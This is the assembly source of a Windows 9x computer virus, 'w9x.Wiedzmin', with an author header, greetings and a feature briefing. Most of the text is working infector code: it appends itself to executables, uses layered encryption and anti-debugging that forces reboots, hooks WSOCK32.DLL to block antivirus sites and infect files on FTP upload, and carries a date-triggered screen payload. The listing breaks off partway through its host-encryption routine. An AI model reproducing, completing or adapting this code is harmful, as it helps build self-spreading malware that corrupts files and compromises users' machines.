; (ASCII-art logo: WIEDZMIN)
;
; (c) YuP - Deithwen Addan - Artist of Rebellion
; yup@tlen.pl
;
; ─────────────────────────
; ─ w9x.Wiedzmin ─
; ─────────────────────────
;
;
; ───────────
; ─DISCLAIMER─
; ───────────
; This is the source of a virus, source only; the compiled version
; cannot leave your computer! The author is NOT RESPONSIBLE FOR ANY
; ACTIONS TAKEN WITH THIS CODE!
;
;
;
; ────────────
; ─ The name ─
; ────────────
;
; The name 'Wiedzmin' was stolen from Andrzej Sapkowski's saga "Wiedzmin"
; (sapkowski.pl, sapkowski.cz) - someone said that he is another
; Tolkien (in my opinion this book is even better than Tolkienz
; "Lord of the Rings").
; Wiedzmin was some kind of mutant (only a few kids out of 10 survive
; the wiedzmin test). As a mutant he was very fast, he was a master of fencing,
; he could see at night, and of course he could make magic signs.
; Blah ...
; Then he went and travelled around the world (he was killing monsterz for money).
; In his journey he met new fantastic characters like Regis (vampire),
; Milva (hunter), Jaskier (bard), Yennefer (witch), Ciri (child of destiny)
; ...
;
; The book is really FANTASTIC! Full of adventures, fights, sex (X-D),
; blood, swearwords, and much much more! I really advise you to READ IT!
; (check translationz for your language: www.sapkowski.pl).
; If you like fantasy you CAN'T miss IT!
;
;
; ────────────
; ─  Music   ─
; ────────────
;
; I'd like to thx some kewl music groups in the rock-hiphop range:
; Outsidez:                       Polish groupz:
;  - Deep Purple                   - Molesta
;  - Iron Maiden                   - Fenomen
;  - Linkin Park                   - Zipera
;  - Rage Against the Machine      - Grammatik
;  - KoRn                          - Eldo
;  - Limp Bizkit                   - Kaliber 44
;
; I'm a weird person ;]
;
;
; ────────────
; ─  Greetz  ─
; ────────────
;
; Greetz go to:
;  - Friendz from my city:
;     Yoo (:])
;     Misiek (thanks for the CDs, man)
;     Klosina (don't throw knives)
;     Straż Miejska (we don't keep our feet on the benches :p)
;     And for the rest of you folks, I didn't list you because
;     you'll never read this anyway.
;
;  - Guyz from Undernet:
;     Toro (busy today?)
;     SlageHammer (helo tester ;D)
;     Spanska (BloodHound.W32.WSWORM ;[)
;     BFF70000h (lagz lagz lagz)
;
;  - Guyz from irc.pl:
;     Blaze (knock knock)
;     Detergent (walek)
;     Shmastah (judeIRC ;])
;     Ajron (the not-real one :P)
;     Aamf-girl (middle-school girl ;P)
;     Wizja (dolly has rheumatism or something ;>)
;     Pafko (dragonball rulez!)
;     Crash (why you? ;P)
;
;
; ────────────
; ─ Briefing ─
; ────────────
;
; Virus name     : w9x.Wiedzmin
; Virus version  : 1.0
; Virus author   : Lord YuP - Deithwen Addan
; Release date   : 6.02.02+8.02.02 I forgot to install SEH, he he
; Virus type     : PE infector and WSOCK32.DLL hooker
; Target Systems : win95<nt>, win98<nt>, winME<t>
;                  [nt] - not tested (should work, if not fuck it!)
;                  [t]  - tested
;
;
; Encryption     : 3 LAYERS CRYPTED BY RANDOM NUMBER!
;                  1 - cryptz main virus body
;                  2 - cryptz host body
;                  3 - cryptz virus data
;
;                  Every layer is crypted by another key.
;
; Virus helper   : When the virus finds a section named differently
;                  from ".text" or "CODE" (EIP must point to it),
;                  it crypts the whole file body and puts only a
;                  decryptor into the last section. The main body
;                  (probably with another virus) is crypted by a
;                  random key. EIP points to the decryptor.
;
;
;
; Polymorphic    : Yep, random key crypting, adding 90h<NOP> garbage
;                  in the range of 0-255.
;
;
; AntiAV         : The virus won't infect filez whose names start
;                  with 'a','A','E','e','v','V'.
;
;
; AntiDEBUG      : Yep, using win9x SoftICE detection and the
;                  IsDebuggerPresent API. When SoftICE is found it
;                  shows a message in the debugger and executes int 19h!
;                  Other debuggers like td32, SoftSnoop and so on = int 19h!
;
;
; WSOCK32 hooker : The virus infects wsock32.dll, replacing the send
;                  and connect function addressez. After a reboot
;                  (wininit.ini ;P) the functionz will be hooked. The
;                  user will never connect to AV sitez (error: host
;                  not found), and when the user tries to put a file
;                  on an FTP account, the virus infects it on the fly.
;
;
;
; Infection procez : The virus infects 7 filez in the local directory
;                  and 7 filez in the windowz directory. It appends
;                  itself to the last section, which is enlarged.
;                  EIP points to it.
;
;
;
; Payload        : On 22.06 or 22.12, on every run it prints a colored
;                  string in an infinite loop. The string will be
;                  VISIBLE everywhere - the virus grabz the active
;                  window's HDC!
;
;
;───────────────────────────────────────────[WIEDZMIN.ASM]───────────────────

.386
.model flat
jumps
locals

extrn ExitProcess:PROC
extrn MessageBoxA:PROC

FILETIME STRUC
  dwLowDateTime  dd ?
  dwHighDateTime dd ?
FILETIME ends

WIN32_FIND_DATA struc                   ;FIND DATA
  dwFileAttributes   dd 0
  dwLowDateTime0     dd ?
  dwHigDateTime0     dd ?
  dwLowDateTime1     dd ?
  dwHigDateTime1     dd ?
  dwLowDateTime2     dd ?
  dwHigDateTime2     dd ?
  nFileSizeHigh      dd ?
  nFileSizeLow       dd ?
  dwReserved         dd 0,0
  cFileName          db 260 dup(0)
  cAlternateFilename db 14 dup(0)
                     db 2 dup(0)
WIN32_FIND_DATA ends

hooksize   equ hook_end-start_h
sendh      equ (offset hooked_send-offset start_h)
connecth   equ (offset hooked_connect-offset start_h)
vvsize     equ HeapEnd-HeapStart
virussize  equ VirusEnd-v_start
allsize    equ virussize
TO_DE      equ @loop_decryptt-@to_this
helper     equ @helper_end-@uncrypt

virussizee macro
  db virussize/10000 mod 10 + "0"
  db virussize/01000 mod 10 + "0"
  db virussize/00100 mod 10 + "0"
  db virussize/00010 mod 10 + "0"
  db virussize/00001 mod 10 + "0"
endm

.DATA
  db ?

.CODE
v_start:
  pushad
  pushfd
  call @delta
@delta:
  pop ebp                               ;ebp now holds the in-memory address of @delta
  sub ebp,offset @delta                 ;-> we must subtract the linked @delta value
  cmp ebp,0
  je @_KERNEL

@main_decryptor:
  lea edx,[ebp+offset @to_this]
  mov eax,[ebp+key_main]
  mov ecx,TO_DE
@loop_decrypt:
  xor byte ptr [edx],al
  inc edx
  loop @loop_decrypt
  cmp edi,'!PUY'
  jne @to_this
  ret

@to_this:
  lea edi,[ebp+offset APIList]
  lea esi,[ebp+offset APIList]
  call @UN_CRYPT_BYTEZ
  lea edi,[ebp+offset TO_CRYPT_DATA]
  lea esi,[ebp+offset TO_CRYPT_DATA]
  call @UN_CRYPT_BYTEZ

@_KERNEL:
  lea eax,[ebp+fault]                   ; Setup a SEH frame
  push eax
  push dword ptr fs:[0]
  mov fs:[0],esp

  mov eax,0BFF70000h                    ;the w95 kernel
  cmp word ptr [eax],'ZM'
  je _GOT_KERNEL                        ;NT maybe later :p
  mov eax,0BFF60000h                    ;load the kernel ;) winME ;)
  cmp word ptr [eax],'ZM'               ;check whether it is an exe file
  je _GOT_KERNEL
  jmp @EXIT

_GOT_KERNEL:
  mov dword ptr [ebp+capis],5h
  mov dword ptr [ebp+Kernel],eax
@go_export:
  mov dword ptr [ebp+NON],000000h
  mov dword ptr [ebp+AOF],000000h
  mov dword ptr [ebp+AON],000000h
  mov dword ptr [ebp+AOO],000000h
  mov edx,eax
  mov ebx,edx
  mov edi,[eax+03ch]                    ;a valid PE ?
  add edx,edi
  cmp dword ptr [edx],'EP'
  jne @EXIT
  mov edx,[edx+078h]                    ;export table
  add edx,eax                           ;now edx -> export table
  mov esi,[edx+018h]
  mov dword ptr [ebp+NON],esi
  mov esi,[edx+1Ch]
  mov dword ptr [ebp+AOF],esi
  add dword ptr [ebp+AOF],eax
  mov esi,[edx+20h]
  mov dword ptr [ebp+AON],esi
  add dword ptr [ebp+AON],eax
  mov esi,[edx+24h]
  mov dword ptr [ebp+AOO],esi
  add dword ptr [ebp+AOO],eax

@export_read:
  mov esi,dword ptr [ebp+AON]
  mov [ebp+offset IndexA],esi           ;save into the naming index
  mov esi,dword ptr [esi]
  add esi,eax
  xor ebx,ebx
@__GPA:
  cmp dword ptr [ebp+capis],5h
  je @zwykle
  lea edi,[ebp+offset A1]
  mov ecx,A1s
  cmp dword ptr [ebp+capis],1
  jne @porownaj
  lea edi,[ebp+offset A2]
  mov ecx,A2s
  jmp @porownaj
@zwykle:
  lea edi,[ebp+offset APIS]             ;offset of the variable
@GET_GPA:
  mov ecx,APIS_SIZE                     ;api size
@porownaj:
  rep cmpsb                             ;scan
  je found                              ;if equal, calculate the function address
Scan_dalej:
  add dword ptr [ebp+offset IndexA],4
  mov esi,[ebp+offset IndexA]
  mov esi,[esi]
  add esi,eax
  cmp dword ptr [ebp+offset NON],ebx
  je @EXIT
  inc ebx
  cmp dword ptr [ebp+offset NON],ebx
  je @EXIT
  jmp @__GPA

found:
  mov eax,ebx                           ;we have GPA !!!
  mov ecx,edi
  inc ecx
  push ecx                              ;onto the stack ;P
  mov eax,ebx                           ;EAX=>counter
  mov ecx,2
  mul ecx                               ;multiply EAX*2
  pop ecx                               ;pop ECX off the stack
  mov esi,[ebp+AOO]
  add esi,eax
  xor eax,eax
  mov ax,word ptr [esi]
  mov ecx,4
  mul ecx
  cmp dword ptr [ebp+go_wsock],1
  jne @skip_it_urgh
  mov esi,[ebp+AOF]
  add esi,eax
  mov eax,[esi]
  cmp dword ptr [ebp+capis],1
  je @make_1
  ;mov ebx,dword ptr [ebp+wsock_hh]
  ;mov dword ptr [ebp+a_send],eax
  ;add dword ptr [ebp+a_send],ebx
  ;mov eax,dword ptr [ebp+a_send]
  mov ebx,sendh
  mov edx,dword ptr [ebp+moj_address]   ;tricky shit ;]
  add edx,ebx
  jmp make_real
@make_1:
  mov ebx,connecth
  mov edx,dword ptr [ebp+moj_address]   ;tricky shit ;]
  add edx,ebx
make_real:
  mov [esi],edx
  inc dword ptr [ebp+capis]
  cmp dword ptr [ebp+capis],2
  je @go_out_now
  mov eax,dword ptr [ebp+wsock_h]
  jmp @go_export
@go_out_now:
  ret

@skip_it_urgh:
  mov esi,[ebp+AOF]
  add esi,eax
  mov edi,dword ptr [esi]
  add edi,[ebp+offset Kernel]
  mov eax,edi
  mov dword ptr [ebp+_GPA],eax

@GET_APIS:                              ;API Search
  xor esi,esi
  lea esi,[ebp+offset APIList]
  lea edi,[ebp+offset _FindFirstFileA]  ;these are dwords, so we step 4 bytes at a time
                                        ;stosd -> from EAX to EDI
@go_table:
  push esi
  push dword ptr [ebp+offset Kernel]
  call dword ptr [ebp+offset _GPA]
  stosd
@next_byte:
  inc esi
  cmp byte ptr [esi],00h
  jne @next_byte
  inc esi
  cmp byte ptr [esi],07h
  jne @go_table

  mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
  mov dword ptr [ebp+gcd],eax
  mov eax,dword ptr [ebp+_WinExec]
  mov dword ptr [ebp+wex],eax

  lea eax,[ebp+offset wsock]
  inc eax
  push eax
  call dword ptr [ebp+_LoadLibraryA]
  mov dword ptr [ebp+wsock_hh],eax
  lea ecx,[ebp+offset sle]
  push ecx
  push eax
  call dword ptr [ebp+offset _GPA]
  mov dword ptr [ebp+_WSASetLastError],eax
  lea ecx,[ebp+offset A1]
  push ecx
  push dword ptr [ebp+wsock_hh]
  call dword ptr [ebp+offset _GPA]
  mov dword ptr [ebp+a_send],eax
  lea ecx,[ebp+offset A2]
  push ecx
  push dword ptr [ebp+wsock_hh]
  call dword ptr [ebp+offset _GPA]
  mov dword ptr [ebp+a_connect],eax

  push 4h                               ; PAGE_READWRITE
  push 1000h                            ; MEM_COMMIT
  push 1000                             ; size of buffer
  push 0                                ; lpAddress
  call dword ptr [ebp+_VirtualAlloc]    ; Alloc IT!
  mov dword ptr [ebp+vbuf],eax

;********************************DEBUG TRAP******************************************************
  ;call @debug_trap
;************************************************************************************************

  call @wsockz
  mov dword ptr [ebp+go_wsock],0

  lea eax,[ebp+SYSTEM_TIME]
  push eax
  call dword ptr [ebp+_GetSystemTime]
  cmp word ptr [ebp+wMonth],6           ;22.06 Midaëte
  jne try_
  cmp word ptr [ebp+wDay],22
  jne try_
  call make_it_real
try_:
  cmp word ptr [ebp+wMonth],12          ;22.12 Midinvaerne
  jne cya_folx
  cmp word ptr [ebp+wDay],22
  jne cya_folx
  call make_it_real
cya_folx:
  call @GGEN_KEY
  lea edi,[ebp+offset APIList]
  lea esi,[ebp+offset APIList]
  call @CRYPT_BYTEZ
  lea edi,[ebp+offset TO_CRYPT_DATA]
  lea esi,[ebp+offset TO_CRYPT_DATA]
  call @CRYPT_BYTEZ

_done:
  lea edi,[ebp+finddata.cFileName]
  call dword ptr [ebp+_GetCommandLineA]
  mov esi,eax
  xor ebx,ebx
_skip_space:
  lodsb
  cmp al,0
  je @GetWDir
  cmp al,' '
  je _ave_it
  jmp _skip_space
_ave_it:
  lodsb
  inc ebx
  cmp al,0
  je @infect_shit
  stosb
  jmp _ave_it
@infect_shit:
  cmp ebx,4
  jl @GetWDir
  lea esi,[ebp+offset finddata.cFileName]
  add esi,ebx
  sub esi,5
  lodsb
  cmp al,'.'
  je yep_it
  jmp @GetWDir
yep_it:
  push dword ptr [ebp+key_main]
  push dword ptr [ebp+key_next]
  push dword ptr [ebp+e_bytes]
  push dword ptr [ebp+e_where]
  push dword ptr [ebp+hosteip]
  push dword ptr [ebp+imagebase]
  call @infect
  pop dword ptr [ebp+imagebase]
  pop dword ptr [ebp+hosteip]
  pop dword ptr [ebp+e_where]
  pop dword ptr [ebp+e_bytes]
  pop dword ptr [ebp+key_next]
  pop dword ptr [ebp+key_main]
  push 0h
  call dword ptr [ebp+_ExitProcess]

@GetWDir:
  lea eax,[ebp+offset winDIR]
  push 260
  push eax
  call dword ptr [ebp+_GetWindowsDirectoryA]
  ;now local dir
  lea eax,[ebp+offset oldDIR]
  push eax
  push 560
  call dword ptr [ebp+_GetCurrentDirectoryA]
  mov dword ptr [ebp+was_win],0000000h
@Find1st:
  mov dword ptr [ebp+ic],0000000h
  lea eax,[ebp+offset finddata]
  push eax
  lea eax,[ebp+offset marker]
  push eax
  call dword ptr [ebp+_FindFirstFileA]
  mov dword ptr [ebp+sHnd],eax
  inc eax
  jz @d_dalej
@workk:
  push dword ptr [ebp+key_main]
  push dword ptr [ebp+key_next]
  push dword ptr [ebp+e_bytes]
  push dword ptr [ebp+e_where]
  push dword ptr [ebp+hosteip]
  push dword ptr [ebp+imagebase]
  call @infect
  pop dword ptr [ebp+imagebase]
  pop dword ptr [ebp+hosteip]
  pop dword ptr [ebp+e_where]
  pop dword ptr [ebp+e_bytes]
  pop dword ptr [ebp+key_next]
  pop dword ptr [ebp+key_main]
@@Fnext:
  lea eax,[ebp+offset finddata]
  push eax
  push dword ptr [ebp+offset sHnd]
  call dword ptr [ebp+_FindNextFileA]
  cmp eax,0
  je @d_dalej
  push dword ptr [ebp+key_main]
  push dword ptr [ebp+key_next]
  push dword ptr [ebp+e_bytes]
  push dword ptr [ebp+e_where]
  push dword ptr [ebp+hosteip]
  push dword ptr [ebp+imagebase]
  call @infect
  pop dword ptr [ebp+imagebase]
  pop dword ptr [ebp+hosteip]
  pop dword ptr [ebp+e_where]
  pop dword ptr [ebp+e_bytes]
  pop dword ptr [ebp+key_next]
  pop dword ptr [ebp+key_main]
  cmp dword ptr [ebp+ic],7
  jne @@Fnext
@d_dalej:
  cmp dword ptr [ebp+was_win],0
  jne @dalej
_WinINF:
  cmp dword ptr [ebp+was_win],0
  jne _stepnext
  lea eax,[ebp+offset winDIR]
  push eax
  call dword ptr [ebp+_SetCurrentDirectoryA]
  mov dword ptr [ebp+ic],0000000h
  mov dword ptr [ebp+was_win],1
  push dword ptr [ebp+sHnd]
  call dword ptr [ebp+_FindClose]
_stepnext:
  cmp dword ptr [ebp+ic],7
  jne @Find1st
@dalej:
  lea eax,[ebp+offset oldDIR]
  push eax
  call dword ptr [ebp+_SetCurrentDirectoryA]
  jmp @EXIT

fault:
  mov esp,[esp+8]
@EXIT:
  push 4000h
  push 1000
  push dword ptr [ebp+vbuf]
  call dword ptr [ebp+_VirtualFree]
  pop dword ptr fs:[0]
  add esp,4
  cmp ebp,0                             ;first GeneratioN?
  jne _ETH                              ;if so, exit ;]
  call fakehost
_ETH:
  call @uncrypt
  popfd
  popad
  call @gd
@gd:
  pop ebp
  sub ebp,offset @gd
  mov eax,dword ptr [ebp+hosteip]
  add eax,dword ptr [ebp+imagebase]
  jmp eax

Kernel dd 0

;<##############################################################################################>
;------------------------------------------------------------------------------------------------
;************************************************************************************************
;INFECT EM GLOWZ !!!!
;************************************************************************************************
;------------------------------------------------------------------------------------------------
;<##############################################################################################>
@infect:
  call @bad_name
  cmp edi,1
  jne _continue
  ret
@infect0:
_continue:
  lea esi,[ebp+offset finddata.cFileName]
  push esi
  call dword ptr [ebp+_GetFileAttributesA]
  mov dword ptr [ebp+fileAtrib],eax
  inc eax
  jz _Out
  lea eax,[ebp+F1]
  push eax
  lea eax,[ebp+F2]
  push eax
  lea eax,[ebp+F3]
  push eax
  push dword ptr [ebp+fHnd]
  call dword ptr [ebp+_GetFileTime]
  push 00000080h
  push esi
  call dword ptr [_SetFileAttributesA+ebp]      ; clean file
  cmp eax,0
  je _Out
  ;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
  ;mov [ebp+offset memory],ecx
  ;Bleh, open it to get a handle
  xor eax,eax
  lea esi,[ebp+offset finddata.cFileName]
  push eax
  push 00000080h
  push 00000003h
  push eax
  push eax
  push 80000000h OR 40000000h
  push esi
  call dword ptr [ebp+_CreateFileA]
  mov edi,eax                           ;handle in edi
  inc eax
  jz _Out
  dec eax
  mov dword ptr [ebp+offset fileHandle],eax
_Oblicz:
  push 0
  push dword ptr [ebp+offset fileHandle]
  call dword ptr [ebp+_GetFileSize]
  mov dword ptr [ebp+fSize],eax
  inc eax
  jz _Out2
  dec eax
  mov dword ptr [ebp+finddata.nFileSizeLow],eax
  mov ecx,dword ptr [ebp+fSize]
  call MapF
  mov ecx,dword ptr [ebp+fSize]
  call VMapF                            ;esi holds the mapping, just like with the kernel
_Check_PE:
  cmp word ptr [esi],'ZM'
  jne _Out3
  mov ecx,[esi+3ch]
  cmp dword ptr [esi+ecx],'EP'
  jne _Out3
  add esi,ecx                           ;ESI => PE HEADER
  mov edi,esi
_Saving:
  mov dword ptr [ebp+header],esi
  mov ecx,[esi+28h]
  mov dword ptr [ebp+hosteip],ecx
  mov ecx,[esi+3ch]
  mov dword ptr [ebp+align],ecx
  mov ecx,[esi+34h]
  mov dword ptr [ebp+imagebase],ecx
  mov ecx,[esi+38h]                     ;get section align value
  mov [ebp+_secAlign],ecx               ;and save it
_Infecto0:
  cmp dword ptr [esi+4ch],"deiW"
  jz _No_infect
  push dword ptr [esi+3Ch]
;***********************************************************************************************
  mov eax,[ebp+offset fMapReal]
  push eax
  mov eax,[ebp+_UnmapViewOfFile]
  call eax
  push dword ptr [ebp+fHndMap]
  call dword ptr [ebp+_CloseHandle]
  ;mov eax,dword ptr [ebp+go_wsock]
  mov eax,dword ptr [ebp+fSize]         ; And Map all again.
  cmp dword ptr [ebp+go_wsock],1
  je @dodaj
  add eax,virussize+vvsize
  ;add eax,vvsize
  jmp @nextt
@dodaj:
  add eax,hooksize
@nextt:
  pop ecx
  call Align_
  mov dword ptr [ebp+memory],eax
  mov ecx,eax
  call MapF
  mov ecx,dword ptr [ebp+memory]
  call VMapF
  cmp dword ptr [ebp+go_wsock],1
  je @0dal
  call @crypt_host
  cmp dword ptr [ebp+help_virus],1
  je _God
@0dal:
  mov esi,[eax+3ch]
  add esi,eax                           ;ESI => PE HEADER
  mov edi,esi
;************************************************************************************************
  inc dword ptr [ebp+ic]
  xor eax,eax
  mov ax,[esi+06h]                      ;load number of sections
  mov ecx,28h                           ;28 bytes for each section header
  dec eax                               ;seeking for last,...
  mul ecx                               ;and mul it
  add esi,eax                           ; Normalize
  add esi,78h                           ; Ptr to dir table
  mov edx,[edi+74h]                     ; EDX = number of dir entries
  shl edx,3                             ; EDX = EDX*8
  add esi,edx                           ; ESI = Ptr to last section
  mov edx,[esi+10h]                     ; EDX = SizeOfRawData
  mov ebx,edx                           ; EBX = EDX
  add edx,[esi+14h]                     ; EDX = EDX+PointerToRawData
  push edx                              ; Preserve EDX
  mov eax,ebx                           ; EAX = EBX
  add eax,[esi+0Ch]                     ; EAX = EAX+VA Address
                                        ; EAX = New EIP
  ;mov [edi+28h],eax                    ; Change the new EIP
  mov dword ptr [ebp+NewEIP],eax        ; Also store it
  cmp dword ptr [ebp+go_wsock],1
  je @infect_then
  mov eax,dword ptr [ebp+NewEIP]
  mov [edi+28h],eax
@infect_then:
  mov eax,[esi+10h]                     ; EAX = new SizeOfRawData
  cmp dword ptr [ebp+go_wsock],1
  je @dallejj
  add eax,vvsize+virussize              ; EAX = EAX+VirusSize
  jmp @nexttt
@dallejj:
  add eax,hooksize
@nexttt:
  mov ecx,[edi+3Ch]                     ; ECX = FileAlignment
  call Align_                           ; Align!
  mov [esi+10h],eax                     ; New SizeOfRawData
  mov [esi+08h],eax                     ; New VirtualSize
  pop edx                               ; EDX = Raw pointer to the
                                        ; end of section
  cmp dword ptr [ebp+go_wsock],1
  je @skip_thiss
  mov eax,[esi+10h]                     ; EAX = New SizeOfRawData
  add eax,[esi+0Ch]                     ; EAX = EAX+VirtualAddress
  mov [edi+50h],eax                     ; EAX = New SizeOfImage
@skip_thiss:
  or dword ptr [esi+24h],0A0000020h
  mov dword ptr [edi+4ch],"deiW"        ;Wiedzmin here ;)
  lea esi,[ebp+v_start]                 ; ESI = Ptr to virus_start
  xchg edi,edx                          ; EDI = Raw ptr after last
  mov dword ptr [ebp+moj_address],edi   ; section
  add edi,dword ptr [ebp+fMapReal]      ;EDI = Normalized ptr
  mov ecx,virussize                     ;ECX = Size to copy
  cmp dword ptr [ebp+go_wsock],1
  jne @write_it
  mov ecx,hooksize
  lea esi,[ebp+start_h]
@write_it:
  cmp dword ptr [ebp+go_wsock],1
  je step_0
  call @crypt_my_body
  jmp step_1
step_0:
  rep movsb                             ;Do it!
step_1:
  cmp dword ptr [ebp+go_wsock],1
  jne _Git
  ret
_Git:
  jmp _God

_No_infect:
  cmp dword ptr [ebp+go_wsock],1
  jne @zw
  mov edx,-1
  jmp _God
@zw:
  mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
  call @zostaf
  dec dword ptr [ebp+ic]
_God:
  mov eax,[ebp+offset fMapReal]
  push eax
  mov eax,[ebp+_UnmapViewOfFile]
  call eax
_Out3:
  push dword ptr [ebp+fHndMap]
  call dword ptr [ebp+_CloseHandle]
_Out2:
  lea eax,[ebp+F1]
  push eax
  lea eax,[ebp+F2]
  push eax
  lea eax,[ebp+F3]
  push eax
  push dword ptr [ebp+fHnd]
  call dword ptr [ebp+_SetFileTime]
  push dword ptr [ebp+offset fileHandle]
  call dword ptr [ebp+_CloseHandle]
  cmp dword ptr [ebp+go_wsock],1
  je @@@z
  push 1
  lea eax,[ebp+santa]
  push eax
  lea eax,[ebp+finddata.cFileName]
  push eax
  call dword ptr [ebp+_CopyFileA]
@@@z:
  ;&restore the attributez
  push dword ptr [ebp+fileAtrib]
  lea eax,[ebp+finddata.cFileName]
  push eax
  call dword ptr [ebp+_SetFileAttributesA]
  mov edx,-1
_Out:
  ret

Align_:
  push edx
  xor edx,edx
  push eax
  div ecx
  pop eax
  sub ecx,edx
  add eax,ecx
  pop edx
  ret

@zostaf:
  xor eax,eax
  push eax
  push eax
  push ecx
  push dword ptr [ebp+fileHandle]
  call dword ptr [ebp+offset _SetFilePointer]
  push dword ptr [ebp+fileHandle]
  call dword ptr [ebp+offset _SetEndOfFile]
  ret

;**************************
;ECX - size to map
;**************************
MapF:
  xor eax,eax
  push eax
  push ecx
  push eax
  push 00000004h
  push eax
  push dword ptr [ebp+fileHandle]
  call dword ptr [ebp+_CreateFileMappingA]
  cmp eax,0
  je _Out2
  mov dword ptr [ebp+fHndMap],eax
  ret

VMapF:
  xor eax,eax
  push ecx
  push eax
  push eax
  push 00000004h OR 00000002h
  push dword ptr [ebp+fHndMap]
  call dword ptr [ebp+_MapViewOfFile]
  cmp eax,0
  je _Out3
  mov dword ptr [ebp+fMapReal],eax
  mov esi,eax
  ret

@TRY_RELOC:
  ret

@debug_trap:
  ;ret
  call dword ptr [ebp+_IsDebuggerPresent]
  or eax,eax
  jz _leave_me
ble:
  mov eax,909119cdh                     ;int 19h!
  jmp $ - 4
_leave_me:
  lea eax,[ebp+sice9x]
  push 00000000h
  push 00000080h
  push 00000003h
  push 00000000h
  push 00000001h
  push 0C0000000h
  push eax
  call dword ptr [ebp+_CreateFileA]
  inc eax
  jz leave_it
  dec eax
  push eax
  call dword ptr [ebp+_CloseHandle]
  lea eax,[ebp+to_ja]
  push eax
  call dword ptr [ebp+_OutputDebugStringA]
  mov eax,909119cdh                     ;int 19h!
  jmp $ - 4
  jmp @EXIT
leave_it:
  ret

;************************************************************************************************
;PayL0ad ;]
;this is very simple coz i don't have any time to make it perfect
;************************************************************************************************
payload:
p_x      dd 0
p_y      dd 0
hdc      dd 0
wh       dd 0
screen_x dd 0
screen_y dd 0
font     dd 0
color:
  dd 15466513
  dd 15474944
  dd 15484928
  dd 15496448

make_it_real:
pay:
  lea esi,[ebp+@GDI_APIZ]
  lea edi,[ebp+@GDI_APIZA]
  lea ebx,[ebp+gdi32]
change_l:
  push ebx
  call dword ptr [ebp+_LoadLibraryA]
  mov ebx,eax
@find_a:
  push esi
  push ebx
  call dword ptr [ebp+_GPA]
  stosd
check_a:
  inc esi
  cmp byte ptr [esi],0
  jne check_a
  inc esi
  cmp byte ptr [esi],77h
  je change_ll
  cmp byte ptr [esi],69h
  je @go_pay
  jmp @find_a
change_ll:
  inc esi
  lea ebx,[ebp+user32]
  jmp change_l
@go_pay:
  push 1
  call dword ptr [ebp+_GetSystemMetrics]        ;user
  mov dword ptr [ebp+screen_y],eax
  push 0
  call dword ptr [ebp+_GetSystemMetrics]        ;user
  mov dword ptr [ebp+screen_x],eax
  call c_font
  lea esi,logo
  xor ebx,ebx
l:
  call dword ptr [ebp+_GetDesktopWindow]        ;user
  mov dword ptr [ebp+wh],eax
  push dword ptr [ebp+wh]
  call dword ptr [ebp+_GetWindowDC]             ;user
  mov dword ptr [ebp+hdc],eax
  call draww
  push dword ptr [ebp+hdc]
  push dword ptr [ebp+wh]
  call dword ptr [ebp+_ReleaseDC]               ;user
  jmp l

draww:
  xor eax,eax
  lodsb
  lea edi,[ebp+jed]
  stosb
  cmp al,0
  jne @wypisz
  lea esi,[ebp+logo]
  lodsb
  lea edi,[ebp+jed]
  stosb
@wypisz:
  cmp al,'i'
  jne @dik
  add dword ptr [ebp+p_x],6
@dik:
  push dword ptr [ebp+font]
  push dword ptr [ebp+hdc]
  call dword ptr [ebp+_SelectObject]            ;gdi
  push 0
  push dword ptr [ebp+hdc]
  call dword ptr [ebp+_SetBkMode]               ;gdi
  mov eax,dword ptr [ebp+color+ebx]
  add ebx,4
  cmp ebx,4*4
  jl @n1
  xor ebx,ebx
@n1:
  push eax
  push dword ptr [ebp+hdc]
  call dword ptr [ebp+_SetTextColor]            ;gdi
  push 1
  lea eax,[ebp+jed]
  push eax
  push dword ptr [ebp+p_y]
  push dword ptr [ebp+p_x]
  push dword ptr [ebp+hdc]
  call dword ptr [ebp+_TextOutA]                ;gdi
  mov eax,dword ptr [ebp+screen_y]
  cmp dword ptr [ebp+p_y],eax
  jae chang_g
  mov eax,dword ptr [ebp+screen_x]
  add dword ptr [ebp+p_x],13
  cmp dword ptr [ebp+p_x],eax
  jle spp
  mov dword ptr [ebp+p_x],0
  add dword ptr [ebp+p_y],15
  jmp spp
chang_g:
  mov dword ptr [ebp+p_y],0
spp:
  push 50
  call dword ptr [ebp+_Sleep]
  ret

c_font:
  push offset famil
  xor eax,eax
  push eax
  push eax
  push eax
  push eax
  push eax
  push eax
  push eax
  push eax
  push eax
  push eax
  push eax
  push 9
  push 9
  call dword ptr [ebp+_CreateFontA]             ;gdi
  mov [font],eax
  ret

@GDI_APIZ:
  db "CreateFontA",0
  db "TextOutA",0
  db "SetBkMode",0
  db "SetTextColor",0
  db "SelectObject",0
  db 77h
  db "GetSystemMetrics",0                       ;user32 part X-D
  db "GetDesktopWindow",0
  db "GetWindowDC",0
  db "ReleaseDC",0
  db 69h

;************************************************************************************************
;Handle this sucker ;]
;************************************************************************************************
@crypt_host:
  ;push dword ptr [ebp+key_next]
  pushad
  mov eax,dword ptr [ebp+fMapReal]
  mov esi,[eax+3ch]
  add esi,eax                           ;ESI => PE HEADER
  mov edi,esi
  xor eax,eax
  mov ax,[esi+06h]                      ;load number of sections
  mov ecx,0h                            ;28 bytes for each section header
  add esi,ecx                           ; Normalize
  add esi,78h                           ; Ptr to dir table
  mov edx,[edi+74h]                     ; EDX = number of dir entries
  shl edx,3                             ; EDX = EDX*8
  add esi,edx                           ; ESI = Ptr to last section
  mov ecx,[edi+28h]
search_it:
  mov ebx,dword ptr [esi+0ch]
  add ebx,dword ptr [esi+08h]
  inc eax
  cmp ecx,ebx
  jb sfound
  dec eax
  jz @e_error
  add esi,28h
  jmp search_it
sfound:
  test dword ptr [esi+24h],10000000h    ;check section attributes
  jnz @e_error
  or dword ptr [esi+24h],0A0000020h
  cmp dword ptr [esi],'xet.'
  je _01
  cmp dword ptr [esi],'EDOC'
  je _01
  mov dword ptr [ebp+help_virus],1
_01:
  push eax                              ;STEP GET RAW ADDRESS
  mov edx,ecx
  sub edx,dword ptr [esi+0ch]           ;IMAGEBASE - VIRTUAL RVA=0
  add edx,[esi+014h]                    ;ADD RAW OFFSET
  mov dword ptr [ebp+e_where],edx
  push edx
  mov edx,[esi+010h]
  mov dword ptr [ebp+e_bytes],edx
  pop edx
  add edx,dword ptr [ebp+fMapReal]      ;WHERE TO CRYPT!
  mov ecx,[esi+10h]
  mov dword ptr [ebp+e_god],0
  mov dword ptr [ebp+firstk],1h
  pushad
  lea edi,[ebp+key_next]
  call @GGEN_KEY
  call @combine_key
  mov eax,dword ptr [ebp+key_next]
